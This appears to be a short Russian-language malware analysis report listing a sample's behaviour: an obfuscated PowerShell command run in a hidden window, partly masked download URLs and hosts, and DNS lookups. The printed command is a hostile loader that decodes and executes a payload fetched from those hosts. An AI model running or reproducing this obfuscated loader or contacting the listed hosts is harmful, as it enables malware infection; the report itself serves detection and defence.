Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ((vARiAblE '*mDR*').NAME[3,11,2]-jOIn'') ( "$( SeT-VaRiAble 'OfS' '')"+[StRiNG]('11E76>77G121~66>90>76E15N18r15K65N74d88>2r64d77~69~74d76K91~15r93L78L65!75!64N66K20N11>64N107E99~109E67L15~1...
- '07###najd.com':80
- 'ow####ansport.com':80
- 'ms###oekt.ru':80
- 'ma###5800.ru':80
- http://07###najd.com/6xwarRebs/
- http://ow####ansport.com/pub/XgMVe3/
- http://www.ms###oekt.ru/bgDfTQGZP/
- http://www.ma###5800.ru/EESPQ169xF/
- DNS ASK 07###najd.com
- DNS ASK ow####ansport.com
- DNS ASK ms###oekt.ru
- DNS ASK ma###5800.ru
- DNS ASK ku######.kienbientech.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ((vARiAblE '*mDR*').NAME[3,11,2]-jOIn'') ( "$( SeT-VaRiAble 'OfS' '')"+[StRiNG]('11E76>77G121~66>90>76E15N18r15K65N74d88>2r64d77~69~74d76K91~15r93L78L65!75!64N66K20N11>64N107E99~109E67L15~1...' (со скрытым окном)